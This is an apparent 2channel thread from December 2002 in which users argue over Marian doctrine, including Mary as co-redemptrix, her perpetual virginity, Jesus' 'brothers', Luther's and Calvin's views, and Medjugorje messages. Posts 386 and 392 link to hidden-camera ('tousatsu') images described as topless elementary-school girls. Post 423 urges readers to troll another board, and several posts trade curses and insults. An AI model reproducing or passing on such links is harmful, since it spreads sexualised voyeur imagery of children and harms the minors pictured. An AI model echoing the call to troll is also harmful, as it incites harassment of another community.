マタイ 12:32 人の子に言い逆らう者は赦される。しかし、聖霊に言い逆らう者は、この世でも後の世でも赦されることがない。」
赦しを必要とする後の世とは、煉獄のことです。

360 :名無しさん@1周年:02/12/08 17:52
>
うざい。安手の希英時点でもいきなさい。あればキッテルとか。この
神学厨房。

361 :名無しさん@1周年:02/12/08 17:54
>>341
前にも出てたけど、それこそウソの強弁ですよ。

っていうか、イエスが言った「婦人」は特別な言い方だとか、
ヨセフが、イエスの誕生「までは」マリアと寝なかった(マタイ1.25)という記述を誤魔化すとか、
正教はイエスの兄弟について「ヨセフの連れ子」とか言い張るし・・・。

正教やカトがこんなくだらねえ屁理屈を並べて信者さんをバカ扱いしてるのに、なんで信者は平気なの?

362 :名無しさん@1周年:02/12/08 18:07
>>361ギリシャ語の兄弟姉妹(アデルフォス、アデルフィ)は親類縁者の意味よ。

マルコ6:3 この人は大工ではありませんか。マリヤの子で、
ヤコブ、ヨセ、ユダ、シモンの兄弟ではありませんか。その妹たちも、
私たちとここに住んでいるではありませんか。」

兄弟ヤコブ、ヨセ、ユダ、シモンは「クレオパのマリア」の子供です!

マルコ3:18「アルパヨの子ヤコブ、タダイ、熱心党員シモン」

マルコ15:40「マグダラのマリヤと、小ヤコブとヨセの母マリヤと・・・」

マタイ27:56「ヤコブとヨセフとの母マリヤ、ゼベダイの子らの母がいた」

使徒1:13「アルパヨの子ヤコブと熱心党員シモンとヤコブの子ユダ」

363 :名無しさん@1周年:02/12/08 18:12
>>361ギリシャ語の兄弟姉妹(アデルフォス、アデルフィ)は親類縁者の意味よ。

マルコ6:3 「この人は…マリヤの子で、ヤコブ、ヨセ、ユダ、シモンの
兄弟ではありませんか。その妹たちも…」

ヤコブ、ヨセ、ユダ、シモンは「クレオファ(アルパヨ)の妻マリア」
の子供です!

マルコ3:18「アルパヨの子ヤコブ、タダイ、熱心党員シモン」

マルコ15:40「マグダラのマリヤと、小ヤコブとヨセの母マリヤと・・・」

マタイ27:56「ヤコブとヨセフとの母マリヤ、ゼベダイの子らの母がいた」

使徒1:13「アルパヨの子ヤコブと熱心党員シモンとヤコブの子ユダ」

364 :名無しさん@1周年:02/12/08 18:14

何だよ!
イエスには実の兄弟はいなかったんじゃネーカ!

バカや労!

365 :名無しさん@1周年:02/12/08 18:17
>>362-363
しつこいよ。文脈を徹底的に無視した用例を持ってくることと、クレオパのマリア云々が、ウソの強弁だと言ったんだけど。

366 :名無しさん@1周年:02/12/08 18:19
>>365
証拠は?ソースキボーン名無しの妄想じゃネエ。根拠ゼロだね。

367 :名無しさん@1周年:02/12/08 18:19
マリヤには複数の息子と複数の娘がいた

368 :名無しさん@1周年:02/12/08 18:22
>>366
文脈なんだから、
「取りて、読め」。ついでに正教の解釈との矛盾をどう説明するんだ?

369 :名無しさん@1周年:02/12/08 18:22
>>361-362
"αδελφός" について以下を参照ください。
http://www.biblestudytools.net/Lexicons/Greek/grk.cgi?number=80&version=
コイネギリシャ語の「兄弟」 "αδελφός" は、2親等の兄弟以外に広い意味があることがわかります。
以下が、リンク先の和訳です。また、ギリシャ語の新約聖書の著者は、
七十人訳聖書を読み引用していたことも留意するべきです。

1. 兄弟。両親、もしくは父親または母親のみを共通して生まれた者。
2. 国民の祖先が同じ、同部族または同郷の人。
3. 任意の仲間または人。
4. 愛の契約で他から結ばれた仲間の信者。
5. 雇用または同僚の仲間。
6. キリストにおける兄弟(brethren)
a. 血縁よるイエスの兄弟。
b. 全ての人。
c. 使徒。
d. 同じ天国に昇天する者としてのキリスト者。

370 :名無しさん@1周年:02/12/08 18:23
マリヤは共同贖罪者ではないという話なのに
永世処女か否かという話に摩り替えるなんて最低。

371 :名無しさん@1周年:02/12/08 18:24
>>365
アラム語では、アルパヨとクロパ(ヨハネ19:25)は類似している
ので、それが同一人を語っているとすれば、ヤコブは『小ヤコブ』で、
母はマリヤ、兄弟はヨセである。

372 :361:02/12/08 18:26
>>369
ありがとう。
で、貴方は、イエスの兄弟たちに言及したナザレの人たちはどういう意味のことを言ったと思う?

373 :名無しさん@1周年:02/12/08 18:27
>>370 何度書かせるんですか。

1、共同贖罪とは:「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、身をもって、キリストの苦しみの欠けた
ところを満たすこと」(聖パウロ・コロサイ1:24)

2、マリアは聖シメオンより預言されました。「剣があなたの心臓をも
刺し貫くでしょう。多くの人の心の思いが現れるため」(ルカ2:35)

剣で心臓がえぐられるほどの苦しみをマリアは味わったのですよ。
何の苦しみですか? 34節に書かれています。

「イスラエルの多くの者が倒れ、また立ち上がるため、反対を受ける」
御子の苦しみです。イスラエルの多くの者とはキリスト者です。

3、結論。マリアはイエスの苦しみを共にする共同贖罪者です。

374 :名無しさん@1周年:02/12/08 18:30
>>372
聖書に書いていませんから、推測でしか分かりません。
私はカトリックですから、伝承に従って2親等以外の人びとであると認めていますが。

375 :名無しさん@1周年:02/12/08 18:30
>>370俺さんウザイよ

376 :名無しさん@1周年:02/12/08 18:38
>>373
別に悪気はないが・・・。
パウロさんが言ったのは、罪を贖う事とは意味が違うようだ。それも文脈から分かる。
むしろ、使徒5.41を比較したら良い。

とはいえ、ドグマに支配された頭では難しいか・・・。

377 :名無しさん@1周年:02/12/08 18:40
>>376
プロにも聖書主義というドグマがあるでしょ。

378 :名無しさん@1周年:02/12/08 18:42
>>375
俺さんじゃないもん

379 :名無しさん@1周年:02/12/08 18:47
>>376
使徒 5:41 それで使徒たちは、イエスの名のために辱めを受けるほどの者にされたことを喜び、最高法院から出て行き、
だから、使徒たちの共贖とは、ことにこれ以上の意味があるわけではありません。
そのため、キリストはゴルゴタで辱めを受けましたが、
使徒の共贖罪とは区別しているのです。

380 :名無しさん@1周年:02/12/08 18:49
>>378
それにしても、俺さんのシンパってホントウザイね。
こんなスレッド立て続けないと、自分の信仰に満足しないらしい。

381 :名無しさん@1周年:02/12/08 18:51
>>374
そうですか。
近所の人から、一緒に居る人の実名を出して言われた文脈での「それ」は、まず間違いなく二親等のように思うのですが・・・。
ついでにいうと、「愛された弟子」ヨハネとその「兄弟」(←これが二親等以外を指す、という人はいないようですね・・)ヤコブこそ、イエスの従弟だろうと思います。

382 :名無しさん@1周年:02/12/08 18:58
>>379
じゃあ、贖罪という語を使う事自体おかしいとは思いませんか?

それから、パウロさんが目を患っていたことも、コロサイの書簡のあの言葉につながったのかもね。ああいう言い方で、暗にほのめかしていると。

383 :名無しさん@1周年:02/12/08 19:13
>>382
>じゃあ、贖罪という語を使う事自体おかしいとは思いませんか?
キリストの贖いと区別しているだけで、使徒等の贖いを否定している訳ではありません。
また贖罪という語彙を用いる否かは定義の単なる問題でしょ。
>それから、パウロさんが目を患っていたことも、コロサイの書簡のあの言葉につながったのかもね。
例のイエス様の言葉「まず自分の目から丸太を取り除け」の前に、
ルカ 6:40 弟子は師にまさるものではない。しかし、だれでも、十分に修行を積めば、その師のようになれる。
とあるではないですか。コロサイ1:24の言葉は、聖使徒パウロの目が開かれたあとの記述です。
これも、私が暗にほのめかしている事柄の推測に過ぎませんが。

384 :383:02/12/08 19:15
>>382
誤:また贖罪という語彙を用いる否かは定義の単なる問題でしょ。
正:また贖罪という語彙を用いる否かは単なる定義の問題でしょ。

385 :ルーテル学生:02/12/08 19:19
こんな感じのスレッドってずっと前からあるけど・・・

・なぜマリアを崇拝してはいけないのか、

・キリストを崇拝してもよく、マリアを崇拝してはいけない理由はどこにあるのか、

・その根拠が仮に聖書だとするならば、それはどうして信じるに値するのか、

・キリストが自分を崇拝するように「キリスト教」の信者に薦めたという事実が
 存在するという確証が、その絶対的な証拠が果たしてあるのか、


386 :ルーテル学生:02/12/08 19:21
http://land3.site.ne.jp/tousatsu/img/0329.jpg
http://land3.site.ne.jp/tousatsu/img/0330.jpg
http://land3.site.ne.jp/tousatsu/img/0315.jpg
http://land3.site.ne.jp/tousatsu/img/0331.jpg

小学校高学年にもなれば胸だって大きくなります。
上半身裸で乾布摩擦させるなんてセクハラだと思います。
女性教師は服を着ているでしょう。
男子や男性教諭が見ているでしょう。

387 :名無しさん@1周年:02/12/08 19:23
>>386
それ見ると、俺様が嬉々として小躍りするでしょうね。

388 :名無しさん@1周年:02/12/08 19:25
本当に そんな学校あるの?
信じられない!

389 :名無しさん@1周年:02/12/08 19:26
>>361君達も同様さ。キリスト教の歩みをきちんと知るべきだ。
君達の聖書に史実が書いてあると考えること自体が間違えなんだ。
それぞれの福音書を読んでいてその矛盾が分からんのかね。
旧約以上に隠ぺい工作がいい加減なんだよ。だから君達は不良なんだ。

いかに神や我々が他より優れているかを証明するためなら
何でもやってきたよ。
キリスト教徒も同じことをやっただけに過ぎないさ。
聖書を見ていてその努力が分からんのかね。

390 :ルーテル学生:02/12/08 19:29
>>386
下手に騙るなよ。
どうせやるならもっと頭良さそうなこと書いて。頼む。

391 :ルーテル学生:02/12/08 19:30

 
ちょっと面白かったけど。

392 :名無しさん@1周年:02/12/08 19:35
>>390
どうでもいいけど、これ盗撮にしてはウソっぽい。
股間の隠し方がわざとらしいね。
http://land3.site.ne.jp/tousatsu/img/0008.jpg
>>386の画像もそうなんじゃない。

393 :名無しさん@1周年:02/12/08 19:39
>>391
スケベ
牧師になるなよ

394 :名無しさん@1周年:02/12/08 19:41
>>383
コロサイのテーマの一つは、「断食や苦行ではキリストの救いは獲得できない」ということなんだけど・・。

イエズス「様」のお言葉は、内面の思考の仕方が成長することについて言っていて、
世の中の師弟関係(たとえば大工)を例えに出してる部分でしょう?

イエズスのみ、とパウロさんがわざわざコロサイで強調してる権能を得る話なわけないでしょ。

395 :名無しさん@1周年:02/12/08 19:50
オーソとカトの伝承が違う理由。
そんなものは、みんな最初は噂話だったってことさ。
プロの言い分、そんなものは推測に過ぎないさ。
それも正典からしかプロは見ようとしないからな。
そういう考え方は、ユダヤ・キリスト教的に間違っていることを、
どうして認めようとしないのかな?
勝手に自分達が正しいと決め付けてるんだからな。
どれもこれも偽証じゃないか。

信仰的に、マリアの神の母説なんて、
あれを否定したらイエスは単に人だろうが。
君達の主が創りたもうたものは、神であり人である者じゃないの?

ここに出てくる自称プロの一部は、
霊にあっては神で、肉にあっては人とかほざいている。
ならば、霊は神が創ったが、肉はマリアが創ったと
言っているのと同じだ。
マリアは女神だといっているのと同じじゃないか。
するとだ、イエスは性的儀式によって創った魔術師と
言っているのと同じだ。
そんな人間が広めるような宗教を、
まともなユダヤ人が信じると思ってるのか!ふざけるな。

396 :名無しさん@1周年:02/12/08 19:54
>>394
>コロサイのテーマの一つは、「断食や苦行ではキリストの救いは獲得できない」ということなんだけど・・。
そうですよ。ルカ 6:40 での修行を積むことは、少なくとも断食や苦行のことではないでしょう。
もしそうなら、聖書が矛盾することになります。あなたの言う通り、修行を積むことは師のようになるためのものであって、
キリストの救いとも直接関係ないでしょうね。
私が言いたいのは、聖使徒パウロがかつて目を患っていたとしても、
彼自身がキリストの苦しみの欠けたところを満たすことに支障は無いと言いたかったんですが。

397 :名無しさん@1周年:02/12/08 20:05
平信徒の、しかもプロに、聖パウロの贖いの気持ちが解るわけないだろ。カトにも言えるだろうが。。w

398 :名無しさん@1周年:02/12/08 20:08
キリストの十字架は、ユダや人のためだろ。異邦人のためには十字架にかかる必要はなかった。

399 :名無しさん@1周年:02/12/08 20:10
異邦人への贖罪が、キリストの苦しみに欠けている部分だろ。異邦人使徒がだから、自らその部分を埋めたんだろ。

400 :名無しさん@1周年:02/12/08 20:12
最初の3年半はユダヤ人のために伝道した。のちの3年半は異邦人のために使徒が伝道した。そこで、ステファノが殺されて、イスラエルをみな離れた。

401 :名無しさん@1周年:02/12/08 20:19
イエスはマリヤから生まれる前から神であった。
故に、マリヤは神の母ではない。

402 :名無しさん@1周年:02/12/08 20:19

異邦人への伝道が続く限り、キリストの贖罪を満たす仕事は続けられるだろうよ。
他のために命を捨てるような本物のキリスト者にこそ言えることさ。

403 :名無しさん@1周年:02/12/08 20:21
>>401受肉したもうた神の母さ。

404 :名無しさん@1周年:02/12/08 20:22
>>396
矛盾??
思考の型がキリストに倣うようになること、これの意味がわからないんだね。

これは、たとえばレーニンの亜流が「ソ連」政権を握った過程で、教条主義者とそうでない者との思考の型の差が、分裂の基本となったことを指摘しとく。
たがいにレーニンを引用したが、
一方は思考から来る結論(文脈を理解した結論)を提示し、
他方は文脈や経緯を無視した字面を主張のために利用した。


・・勝利は、ニセ教条主義者のものだった。
キリスト教と同じさ。

405 :名無しさん@1周年:02/12/08 20:24
>>402
違う

ヨハネ19の28〜30

406 :名無しさん@1周年:02/12/08 20:25
>>403
迷信さ

407 :名無しさん@1周年:02/12/08 20:31
イエスはマリヤから生まれる前から神であり、
マリヤが生まれる前から神であり、
天地が造られる前から神であった。

イエスはアブラハムやヨシュアに現れている。

408 :散歩の途中:02/12/08 20:34
ものすごい勢いでスレが伸びてるので、全部読むことができません。
だから、私はこれにてレスをやめますが、最後にこれだけ。

>>289
「信仰義認」という「日本語」はないです。
でも、その思想は聖書の中にあります。
それと同じ事を聞いているのです。

「マリアが共同贖罪者という思想が、聖書の中にあるか」

「マリアが」という限定された思想は、残念ながら「ありません」
この思想を、「純粋に釈義だけで聖書から導き出す」のは、「不可能です」。
それをするためには、カトリック教会が積み上げてきた「聖伝」に頼るしかないのです。
聖伝からマリアに関する教理を構築し、それに基づいて聖書を釈義したときにはじめて、
マリアに関する教説が「聖書に基づく」ように「見える」のです。
だから、「聖書と聖伝」とを、教理の源泉として考えるカトリック的立場からすれば、
マリア崇敬も含め、マリアに関する教説は正しくなります。

長くなりそうなので、いったんきります。

409 :散歩の途中:02/12/08 20:42
続き。

プロテスタントは、4世紀末のカルタゴ会議において決定したカノンだけを、教理の源泉と考えます。
つまり、それ以前に成立した教説も、いったんこの聖書に照らした上で、
聖書が指し示す教理だけを、取り入れるという考え方です。
もちろん、古代において成立した信条(ニケア・コンスタンチノポリス、カルケドン等)は、
基本的な信仰告白として、採用しております。
しかし、そこにおいてもマリアに関する教説は、語られておりませんので、
プロテスタントは、それを採用しないわけですし(もちろん使徒信条においても、「処女マリアより生まれ」以外には、
マリアに関する教説は記されていません)、そこからはみ出す部分は、退けるわけです。

つまり、何が言いたいのかというと、
聖伝に属する部分は、信条が告白しているものは採用する、また、聖書に明らかに記されているものも採用するけれども、
それ以外のものは、採用しない、ということです。
そこで、マリアが共同贖罪者であるということが、聖書の中に明らかに記されているのかどうかを、聞いたわけですよ。
それがないなら、プロテスタントの陣営では、それを採用することはできかねるわけです。
カトリックの教理として確立するのは、それはそれでいいと思います。
しかし、私たちはそれを取り入れることはできないのです。
たとえ、馬鹿だのあほだのとけなされても、です。

410 :名無しさん@1周年:02/12/08 20:42
>>408
なるほど。
いまや、聖伝を「歴史の審判」に出さなくてはいけません。


これが何を意味するかは、知ってる人には自明なんでしょうが・・・。

411 :散歩の途中:02/12/08 20:47
プロテスタント教会の、基本的な姿勢は、次のとおりです。

「御言葉によって、絶えず改革され続ける信仰。」

人間には、間違いがあります。罪も犯します。
教会もそうです。キリストの体としての教会であると同時に、
地上の組織、人間の集まりとしての教会は、罪を犯し、過ちを犯します。
けれども、そのたびごとに、教会は神のみ言葉である聖書に立ち返り、
そこにおいて悔い改め、改革されつづけながら、
キリストの再臨を待ち望む群れなのです。
過ちを過ちとして認める事は、神の民として必要な、大切なことだと思います。
旧約聖書出エジプト記を読むと、そのことがよくわかります。

カトリックの皆様と共に、神の民として、福音を証しつづけたく願っております。

412 :散歩の途中:02/12/08 20:50
長々と連続投稿をして、失礼しました。

自らがよって立つ信仰にしっかりと立ちつづけながら、
救いの完成を目指して、励みましょうよ。
ののしりあい、裁きあうのは、もうやめませんか。

では、主の平和が共に♪
    by (−−)

413 :名無しさん@1周年:02/12/08 20:51
>>363
アデルフォス、アデルフィ
は全く意味が違う。

414 :(−−):02/12/08 20:55
>>411
間違った。。。
「御言葉によって絶えず改革されつづける教会」だった。
ヲイラ、すぐこういうミスをするんだよなあ。。。
おっちょこちょいで困る。

415 :名無しさん@1周年:02/12/08 21:02
>>412
裁くなと称して、自己を正当化するのか?最低だな!

416 :シスター・ブリージ:02/12/08 21:37
ルターとカルヴァンのマリア論
プロは観念しなさい。

A,マルチン・ルター
1、神の母
「マリアは正しく、人の母であるばかりか、神の母とも呼ばれる。
マリアがまことの神のおん母であることは確かである。」(Martin Luther,
Weimar edition of Martin Luther's Works, English translation edited
by J. Pelikan [Concordia: St. Louis], volume 24, 107.)

2、終生童貞
「マリアが主の御母でありかつ処女であるというのは信仰箇条である」
(Martin Luther, op. cit., Volume 11, 319-320.)

3、無原罪の宿り
「マリアの霊魂の受胎が原罪なく行われたというのは、甘美なる、
敬虔なる信仰である。すなわち、霊魂の受胎そのものにおいて、
マリアもまた原罪を免れ、神の賜物に満たされ、神によって受胎する
純なる霊魂を受け、こうして、生の最初の瞬間から、すべての罪を
拭われていたという信仰である。」
("On the Day of the Conception of the Mother of God," 1527).

417 :シスター・ブリージ:02/12/08 21:38
4、被昇天
「処女マリアが天国におられることは疑い得ない。それがどのようにして
起こったのかは、私たちにはわからない。」(Martin Luther, Weimar edition of
Martin Luther's Works Translation by William J. Cole 10, p. 268.)

5、マリア崇敬
「マリア崇敬は人間の心の奥底に記されている」(Martin Luther, Weimar
edition of Martin Luther's Works 10, III, p.313.)
「キリストのみがたたえられるのでしょうかか?神の聖母はたたえられる
べきではないのでしょうか?この方は蛇の頭を踏み砕いた婦人。どうか、
私たちに耳を傾けてくだい。御子はあなたの願いを拒まないからです」
(1546年1月、ウィッテンベルクにおける最後の説教。Martin Luther,
Weimar edition of Martin Luther's Works, English translation
edited by J. Pelikan [Concordia: St. Louis], Volume 51, 128-129.)

418 :シスター・ブリージ:02/12/08 21:38
B.カルビン
「エリサベツはマリアを「主のおん母」と呼んだ。マリアに受胎する
肉なる人が、同時に永遠の神であると彼女がいえるほど、
その人性はキリストの2性質に融和していたからである。」
(John Calvin, Calvini Opera [Braunshweig-Berlin, 1863-1900], Volume 45, 35.)

「マリアに何人も子供がいたという、ヘルビディウスは、無知過ぎる。
幾つかの箇所で、それはキリストの従兄弟であると示されている
からである。」(Bernard Leeming, "Protestants and Our Lady", Marian
Library Studies, January 1967, p.9. )

419 :シスター・ブリージ:02/12/08 21:39
「御子の母に選ばれ、運命付けられることによって、神がマリアに最高の
栄誉を授けられたことは否定できない。」( John Calvin, Calvini Opera
[Braunshweig-Berlin, 1863-1900], Volume 45, 348.)

「御子の母とならせたもうことにおいて、神がマリアに崇敬と誉れを
お与えになったことに思いを馳せずして、キリストにある祝福を楽しむ
ことはできない」(John Calvin, A Harmony of Matthew, Mark and Luke
(St. Andrew's Press, Edinburgh, 1972), p.32.)

420 :シスター・ブリージ:02/12/08 21:55
>>361ギリシャ語の兄弟姉妹(アデルフォス、アデルフィ)は親類縁者の意味よ。

マルコ6:3 「この人は…マリヤの子で、ヤコブ、ヨセ、ユダ、シモンの
兄弟ではありませんか。その妹たちも…」
ヤコブ、ヨセ、ユダ、シモンは「アルパヨの妻マリア」の子供です!
1、ヤコブ、タダイ、シモンの父はアルパヨです。
マルコ3:18「アルパヨの子ヤコブ、タダイ、熱心党員シモン」
2、ヤコブ=小ヤコブとヨセ=ヨセフの母はマリヤです。
マルコ15:40「…小ヤコブとヨセの母マリヤと…」
マタイ27:56「ヤコブとヨセフとの母マリヤ…」
3、ユダはヤコブの兄弟です(聖書辞典)
ユダ1:1「イエス・キリストのしもべ、ヤコブの兄弟であるユダ」

結論:主の兄弟とされる、(小)ヤコブ、ヨセ(フ)、ユダ、シモンは、
アルパヨとマリアの実子であり、ヨセフとマリアの実子ではありません。

421 :名無しさん@1周年:02/12/08 22:04
>>420

マリアは一生処女だったわけですね。
兄弟姉妹はみな、従兄妹だったってことですね。
しかも、マリア崇敬の大切ささえ、
プロテスタントの創始者があかししているということですね。

サンクス!

422 :シスター・ブリージ:02/12/08 22:07
>>409

マリア崇敬は初代教父の時代からされております。
あなたが4世紀以前の会議を一切無視するというのは、
本当に不完全極まりないことであるとしか考えられませんが、
お好きなように。

423 :名無しさん@1周年:02/12/08 22:08
荒らしてください
反応が面白い

http://www.am.wakwak.com/~ruru/cgi-bin/bbs/kb.cgi

424 :シスター・ブリージ:02/12/08 22:10
ファチマとメジュゴリエ

メジュゴリエの子供たち
1996年2月15日メジュゴリエにて 
イエズスはたたえられますように

1992年に、ルチア修道女は、「秘密は教会権威者のためのものです」、
聖母はそれが公にされるべきであると一度も言ったことがありません、
と公式に声明しました。

それで、秘密が現在知られていると言って、人々を惑わさないようにしま
しょう。これまでのどの教皇様も、秘密を暴く考えはお持ちではありませ
んでした。ヨハネス23世は「必要なら」そうしようと考えましたが、キュ
ーバ危機(62年)に差し止められました。

425 :シスター・ブリージ:02/12/08 22:11
僭越にも、非公認のジャーナリストたちは、ケネディー大統領とフルシチ
ョフに、それを明らかにするよう手紙を書いたといいます。しかし、ロー
マは、この噂を一度も確証していません。真実だったなら認めていたでし
ょう。ローマは常に事実しか認めません。(ヴァチカンの慣習です)

一方、ヴァチカンは、秘密を引用せず、誤った政策の深刻な結末を考えさ
せることによって、どの首脳にも外交的に適用したはずはずです。このよ
うな適用は、ファチマの秘密によってのみ、できたことなのです。

ヴィットリオ・メッソーリとの対談で、ラッツィンガー枢機卿は、自分自
身、秘密を読み、そこから二つの点を引き出したといわれました。

426 :シスター・ブリージ:02/12/08 22:11
1、 マリアは単なる信心以上に位置付けられるべきである。聖母は信仰生
活の中心である。
2、 どれほど今は不適当に思えても、教会はこの信仰の教理を教えなけれ
ばならないという事実を確認した。

1980年に、ヨハネ・パウロ二世は何度か教皇科学アカデミーを通して
外交へ介入しました。たとえば、アカデミーの職員を核施設に派遣し、
核戦争の結果するものを知らせました。

さらには、演説を通して、教皇科学アカデミー、生命研究所を通して、
環境に関する声明を通して、少しづつ秘密の内容を世界に広めています。
また、カイロ、北京、イスタンブールでのヴァチカンの声明を通して、
これを行っています。

427 :シスター・ブリージ:02/12/08 22:11
マリアの戦略を知りたいというかたは、教皇様のお言葉(1983年、
ドイツ・フルダの青年集会での対話)に注意するべきです。メディアが
この力強いお言葉を曇らせるばかりか、捻じ曲げて引用しているのは
残念なことです。教皇様のお話を全部読みたい方は、オッセルバトーレ
ロマーノを読んで下さい。

また、「ファチマ:ルチア修道女自身の言葉」の最新刊に添付された、
ルチアの覚書にも特に注意すべきです。というのも、その神秘的生活が姉
妹を聖母に密着させているからです。

ルチア修道女と密にされている教皇様が、「メジュゴリエはファチマの継
続です」と言われているのですから、教皇様はその理由を御存知です。
「どんな妨害があってもメジュゴリエに行きたい」ともおっしゃっている
のですから、教皇様はその理由をも御存知なのです。

428 :シスター・ブリージ:02/12/08 22:12
真実を得るには、私たちは源に向かう必要があります。この場合には、
何よりも、ルチア修道女。次に教皇様。そして、ラッツィンガー枢機卿
です。3人の言葉に何らかの矛盾があれば、特に、それが誰からも任命さ
れていない者から引用されるならば、無視すべきです。それはメディアの
戯言に過ぎません。

私たちには聖母がおられ、当然ながら、聖母が支配されています。そ
のために、聖母は、私たちの基準に合わない道具をお選びになります。

予想もつかない方法で、聖母は目標を遂げられます。私たちは、最後には、
聖母の汚れなき御心が勝利するのを知ることでしょう。いつでしょうか。
それは、私たちが、「今」、愛に回心することにかかっているのです。
――
マルトー・ロバン(現在ローマで列福調査中のフランス人神秘家)が
「大いなる出来事」の勃発に関して恐怖心をあらわにしたフランス人
司祭に言ったように、「大いなる出来事。それは私たちの心の中で、
日々起こっているのです」。

ゴスパ、あなたの恵みのマントが私たちの避難所でありますように。
http://www.nd.edu/~mary/reports/2_15_96.html

429 :シスター・ブリージ:02/12/08 22:13
メジュゴリエの子供たち5/13/2000
イエズスがたたえられますように!

1) 教皇様がファチマ第3の秘密を明らかにされました!5月13日、
ファチマで、二人の小さき羊飼い、ヤシンタとフランシスコを、列福する
式典で、教皇様はファチマの「第3の秘密」を知らされました。そこには、
暗殺の試みの幻が含まれていました。無神論の組織が教会に対して起こる
戦争、信仰の証人達が二千年期の最後の世紀に耐え忍ぶ大きな苦しみが
述べられていました。それは20世紀の教皇様が導かれる、果てしない十
字架の道行きを物語っています。

2) この前の金曜日の夜に、聖母はイヴァンへの出現に立ち会うよう、
私たちを山にお招きになりました。大いなる5月13日の夜の祈りの集会
で、ゴスパは歓びに満ちておられました。その夜、聖母が世界平和のた
めに特別にお祈りになったのは偶然ではありません。それは、第1次世
界大戦の終結を早める道具に選んだ、2人の子供たちに、まさしく聖母が
お求めになったことなのです。

430 :シスター・ブリージ:02/12/08 22:14
それは、毎日ロザリオを祈り、聖母の汚れなき御心を通して神に犠牲をさ
さげるということです。ヤチンタは、死ぬ前に従姉のルチアにいいました。

「神が世界の平和をマリアに委ねられたので、私たちは、聖母の汚れなき
御心を通してそれを求めなければなりません」

聖母自らメジュゴリエでお与えになった、汚れなき御心に捧げられる美し
い祈りを、誰もが祈るように提案します。


431 :シスター・ブリージ:02/12/08 22:14
「ああ、善徳に燃える、マリアの汚れなき御心よ。
その御愛を私たちにお示しください。
ああ、マリア様、あなたのみ心の炎が、全ての民の上に注がれますよう。
あなたを心から愛します。たえずあなたを求められるよう、
私たちの心の中にまことの愛を刻んでください。
ああ、マリア様、心の謙遜なおん者よ、罪に陥った時に、
私たちをどうか覚えてください。
あなたは全ての民が罪を犯しているのを御存知です。
その汚れなき御心によって、私たちに健全な霊魂をお与えください。
私たちが常に、あなたの母心の善徳を仰ぎ、あなたの御心の炎によって
回心しますように。アーメン。」(11/28/83)

3) 列福の行われた日が、ファチマの日(5/13/1917)であるば
かりか、暗殺未遂の記念日(5/13/1981)であったのは意義深いことです。
そして、フロッサールドの伝記によれば、病院に運ばれてくるときに、
ただひとつの祈りが教皇様の唇からもれてきたといいます。

432 :シスター・ブリージ:02/12/08 22:14
教皇様は、「マリアよ、きたりたまえ!」、「マリアよ、きたりたまえ!」
と何度もお祈りになっていたのです。ゴスパがメジュゴリエでご出現を開
始されたのは、その翌月のことでした!

1984年3月25日、「3回選びました」とメジュゴリエで聖母が仰った、
この聖なる教皇様は、ファチマで聖母がお求めになった奉献を果たされま
した。おなじ日のその数時間後に、メジュゴリエで、聖母は子供たちにい
われました。

「私と私の天使たちと、歓びを共にしなさい。私の計画の一部が実現した
からです。多くの人が回心していますが、なお、多くの人が、回心を望ん
でいません。祈りなさい!」

それはメジュゴリエでの聖母の1000回目の御出現でした!

433 :シスター・ブリージ:02/12/08 22:16
教皇様は、奉献を終えられたその日、クレムリンでともに奉献を行い、
戻ってきたばかりのポール・ニリッツァ司教様と、4時間を過ごされまし
た。友がメジュゴリエに立ち寄らずに戻ってきたのに驚かれて、教皇様は
言われました。

「メジュゴリエはファチマの実現であり継続なのです!」

ゴスパご自身、7年後に、教皇様のお言葉を確認なさっています。

「愛する子供たちよ!今日もあなた方を祈りに招きます、
今までにないほど、私の計画が実現され始めたからです…
9日間犠牲を捧げるように招きます。
私が、ファチマで始めた秘密を通して実現しようとしているすべてが、
あなた方の助けによってまっとうされるためです。
愛する子供たちよ。私の到来の大切さ、状況の深刻さを
理解するように招きます」(8/25/91)

434 :シスター・ブリージ:02/12/08 22:17
翌月には、メジュゴリエからこのようにお招きになりました。
「私の汚れなき御心が罪の世に勝利するのを助けてください!」(9/25/91)

聖母の汚れなき御心の勝利なくして、ファチマの実現がありえたでしょう
か。これがメジュゴリエでのご出現が最後になる理由を説明します。

聖母は、ファチマで、「最後に私の汚れなき御心が勝利するでしょう!」
と未来についての預言をお与えになりました。教皇ヨハネ・パウロ二世は、
「希望の敷居を渡る」の中で宣言されました。

「勝利があるとすれば、マリアによってです。キリストは聖母を通して勝
利するでしょう。キリストは聖母と一つになって、今後も勝利をお望みに
なっているからです…マリアはファチマの3人の子供に現れて、世紀末の
今、実現しようとしている言葉をお与えになったのです」(p227)

435 :シスター・ブリージ:02/12/08 22:17
教皇様とルチア修道女は長時間話しあいました。修道女がメジュゴリエ
について聖母ご自身から得たことを教皇様にお話くださっていればと思
います。(『90年代のメジュゴリエ』91年8月の章を参照)

今日、多くの人々が、ありとあらゆる予言に耳を貸して、恐怖の売人がお
金儲けをしています。しかし、マリアの使徒と呼ばれるメジュゴリエの子
供たちは、聖母の歓びを発散することが責任です。聖母は未来に治めよう
と今誕生しつつあるものをお歓びになっているのです。「それは私の心が待
ち切れないほどに望んでいる平和の時代です!」(6/25/95)
――
小さきヤチンタとフランシスコを模範にして、積極的に、愛をもってその
計画を支えることによって、聖母の勝利を速めようではありませんか!

愛するゴスパ。あなたがお選びになったこの教皇様に、心から感謝いたし
ます。また、あなたの汚れなき御心の勝利のために私たちを選んでくださ
ったことにも。    シスター・エマヌエル

436 :名無しさん@1周年:02/12/08 22:23
>>401そう主張するなら、人性と神性は分離しているとなる。
イエスは魔女マリアが性魔術を悪魔と行って誕生した悪魔の子となるのだ。
自分が何を言っているのかもう一度考えるべきさ。
日本の宗教では人は神性と人性をもっているというらしいが、
常に分離・対立しているらしいじゃないか。
それと同じことをお前達は言っているのだ。
そんな邪悪な思想があたかも主から出たように主張するとは、
そんな主張は我々は絶対に許さない。呪われよ!

437 :名無しさん@1周年:02/12/08 22:28
忌まわしい蛇の子よ、呪われよ!

438 :名無しさん@1周年:02/12/08 22:43

age

439 :名無しさん@1周年:02/12/08 23:26
俺さんを「アナテマ俺さん」と呼ぶことにしよう

440 :名無しさん@1周年:02/12/08 23:36
ルターがマリアを「無原罪懐胎」と信じていたというのはすごいな。
原罪がないということは、「死を通らない」ということだ。
マリアはやはり、体をもって昇天したことになる。
こだいのエノクのように。これは凄い発見だ!


441 :名無しさん@1周年:02/12/08 23:38
俺は教会に入るとすれば、カトリックだ。決めた。

442 :名無しさん@1周年:02/12/08 23:47
罪の代償は死というのが、神の定められた律法です。
